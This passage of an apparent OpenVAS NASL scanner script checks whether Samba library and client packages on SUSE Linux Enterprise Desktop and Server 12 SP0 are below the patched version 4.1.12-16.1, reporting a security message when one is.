rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libregistry0-debuginfo\", rpm:\"libregistry0-debuginfo~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsamba-credentials0-32bit\", rpm:\"libsamba-credentials0-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsamba-credentials0\", rpm:\"libsamba-credentials0~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"libsamba-credentials0-debuginfo-32bit\", rpm:\"libsamba-credentials0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsamba-credentials0-debuginfo\", rpm:\"libsamba-credentials0-debuginfo~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsamba-hostconfig0-32bit\", rpm:\"libsamba-hostconfig0-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsamba-hostconfig0\", rpm:\"libsamba-hostconfig0~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsamba-hostconfig0-debuginfo-32bit\", rpm:\"libsamba-hostconfig0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsamba-hostconfig0-debuginfo\", rpm:\"libsamba-hostconfig0-debuginfo~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsamba-util0-32bit\", rpm:\"libsamba-util0-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsamba-util0\", rpm:\"libsamba-util0~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsamba-util0-debuginfo-32bit\", rpm:\"libsamba-util0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsamba-util0-debuginfo\", rpm:\"libsamba-util0-debuginfo~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsamdb0-32bit\", rpm:\"libsamdb0-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) 
!= NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsamdb0\", rpm:\"libsamdb0~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsamdb0-debuginfo-32bit\", rpm:\"libsamdb0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsamdb0-debuginfo\", rpm:\"libsamdb0-debuginfo~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient-raw0-32bit\", rpm:\"libsmbclient-raw0-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient-raw0\", rpm:\"libsmbclient-raw0~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient-raw0-debuginfo-32bit\", rpm:\"libsmbclient-raw0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient-raw0-debuginfo\", rpm:\"libsmbclient-raw0-debuginfo~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-32bit\", rpm:\"libsmbclient0-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0\", rpm:\"libsmbclient0~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-debuginfo-32bit\", rpm:\"libsmbclient0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-debuginfo\", rpm:\"libsmbclient0-debuginfo~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbconf0-32bit\", rpm:\"libsmbconf0-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbconf0\", rpm:\"libsmbconf0~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbconf0-debuginfo-32bit\", rpm:\"libsmbconf0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbconf0-debuginfo\", rpm:\"libsmbconf0-debuginfo~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbldap0-32bit\", rpm:\"libsmbldap0-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbldap0\", rpm:\"libsmbldap0~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbldap0-debuginfo-32bit\", rpm:\"libsmbldap0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbldap0-debuginfo\", rpm:\"libsmbldap0-debuginfo~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtevent-util0-32bit\", rpm:\"libtevent-util0-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtevent-util0\", rpm:\"libtevent-util0~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtevent-util0-debuginfo-32bit\", rpm:\"libtevent-util0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if 
((res = isrpmvuln(pkg:\"libtevent-util0-debuginfo\", rpm:\"libtevent-util0-debuginfo~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0-32bit\", rpm:\"libwbclient0-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0\", rpm:\"libwbclient0~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0-debuginfo-32bit\", rpm:\"libwbclient0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0-debuginfo\", rpm:\"libwbclient0-debuginfo~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-32bit\", rpm:\"samba-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client-32bit\", rpm:\"samba-client-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client-debuginfo-32bit\", rpm:\"samba-client-debuginfo-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client-debuginfo\", rpm:\"samba-client-debuginfo~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-debuginfo-32bit\", 
rpm:\"samba-debuginfo-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-debuginfo\", rpm:\"samba-debuginfo~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-debugsource\", rpm:\"samba-debugsource~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-libs-32bit\", rpm:\"samba-libs-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-libs\", rpm:\"samba-libs~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-libs-debuginfo-32bit\", rpm:\"samba-libs-debuginfo-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-libs-debuginfo\", rpm:\"samba-libs-debuginfo~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-32bit\", rpm:\"samba-winbind-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-debuginfo-32bit\", rpm:\"samba-winbind-debuginfo-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-debuginfo\", rpm:\"samba-winbind-debuginfo~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-doc\", rpm:\"samba-doc~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"SLES12.0SP0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libdcerpc-binding0\", rpm:\"libdcerpc-binding0~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libdcerpc-binding0-debuginfo\", rpm:\"libdcerpc-binding0-debuginfo~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libdcerpc0\", rpm:\"libdcerpc0~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libdcerpc0-debuginfo\", rpm:\"libdcerpc0-debuginfo~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libgensec0\", rpm:\"libgensec0~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libgensec0-debuginfo\", rpm:\"libgensec0-debuginfo~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libndr-krb5pac0\", rpm:\"libndr-krb5pac0~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libndr-krb5pac0-debuginfo\", rpm:\"libndr-krb5pac0-debuginfo~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libndr-nbt0\", rpm:\"libndr-nbt0~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libndr-nbt0-debuginfo\", rpm:\"libndr-nbt0-debuginfo~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libndr-standard0\", rpm:\"libndr-standard0~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libndr-standard0-debuginfo\", rpm:\"libndr-standard0-debuginfo~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libndr0\", rpm:\"libndr0~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libndr0-debuginfo\", rpm:\"libndr0-debuginfo~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnetapi0\", rpm:\"libnetapi0~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnetapi0-debuginfo\", rpm:\"libnetapi0-debuginfo~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpdb0\", rpm:\"libpdb0~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpdb0-debuginfo\", rpm:\"libpdb0-debuginfo~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libregistry0\", rpm:\"libregistry0~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libregistry0-debuginfo\", rpm:\"libregistry0-debuginfo~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsamba-credentials0\", rpm:\"libsamba-credentials0~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsamba-credentials0-debuginfo\", rpm:\"libsamba-credentials0-debuginfo~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsamba-hostconfig0\", 
rpm:\"libsamba-hostconfig0~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsamba-hostconfig0-debuginfo\", rpm:\"libsamba-hostconfig0-debuginfo~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsamba-util0\", rpm:\"libsamba-util0~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsamba-util0-debuginfo\", rpm:\"libsamba-util0-debuginfo~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsamdb0\", rpm:\"libsamdb0~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsamdb0-debuginfo\", rpm:\"libsamdb0-debuginfo~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient-raw0\", rpm:\"libsmbclient-raw0~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient-raw0-debuginfo\", rpm:\"libsmbclient-raw0-debuginfo~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0\", rpm:\"libsmbclient0~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-debuginfo\", rpm:\"libsmbclient0-debuginfo~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbconf0\", rpm:\"libsmbconf0~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbconf0-debuginfo\", rpm:\"libsmbconf0-debuginfo~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n 
{\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbldap0\", rpm:\"libsmbldap0~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbldap0-debuginfo\", rpm:\"libsmbldap0-debuginfo~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtevent-util0\", rpm:\"libtevent-util0~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtevent-util0-debuginfo\", rpm:\"libtevent-util0-debuginfo~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0\", rpm:\"libwbclient0~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0-debuginfo\", rpm:\"libwbclient0-debuginfo~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client-debuginfo\", rpm:\"samba-client-debuginfo~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-debuginfo\", rpm:\"samba-debuginfo~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-debugsource\", rpm:\"samba-debugsource~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-libs\", rpm:\"samba-libs~4.1.12~16.1\", 
rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-libs-debuginfo\", rpm:\"samba-libs-debuginfo~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-debuginfo\", rpm:\"samba-winbind-debuginfo~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libdcerpc-binding0-32bit\", rpm:\"libdcerpc-binding0-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libdcerpc-binding0-debuginfo-32bit\", rpm:\"libdcerpc-binding0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libdcerpc0-32bit\", rpm:\"libdcerpc0-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libdcerpc0-debuginfo-32bit\", rpm:\"libdcerpc0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libgensec0-32bit\", rpm:\"libgensec0-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libgensec0-debuginfo-32bit\", rpm:\"libgensec0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libndr-krb5pac0-32bit\", rpm:\"libndr-krb5pac0-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libndr-krb5pac0-debuginfo-32bit\", 
rpm:\"libndr-krb5pac0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libndr-nbt0-32bit\", rpm:\"libndr-nbt0-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libndr-nbt0-debuginfo-32bit\", rpm:\"libndr-nbt0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libndr-standard0-32bit\", rpm:\"libndr-standard0-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libndr-standard0-debuginfo-32bit\", rpm:\"libndr-standard0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libndr0-32bit\", rpm:\"libndr0-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libndr0-debuginfo-32bit\", rpm:\"libndr0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnetapi0-32bit\", rpm:\"libnetapi0-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnetapi0-debuginfo-32bit\", rpm:\"libnetapi0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpdb0-32bit\", rpm:\"libpdb0-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpdb0-debuginfo-32bit\", rpm:\"libpdb0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsamba-credentials0-32bit\", 
rpm:\"libsamba-credentials0-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsamba-credentials0-debuginfo-32bit\", rpm:\"libsamba-credentials0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsamba-hostconfig0-32bit\", rpm:\"libsamba-hostconfig0-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsamba-hostconfig0-debuginfo-32bit\", rpm:\"libsamba-hostconfig0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsamba-util0-32bit\", rpm:\"libsamba-util0-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsamba-util0-debuginfo-32bit\", rpm:\"libsamba-util0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsamdb0-32bit\", rpm:\"libsamdb0-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsamdb0-debuginfo-32bit\", rpm:\"libsamdb0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 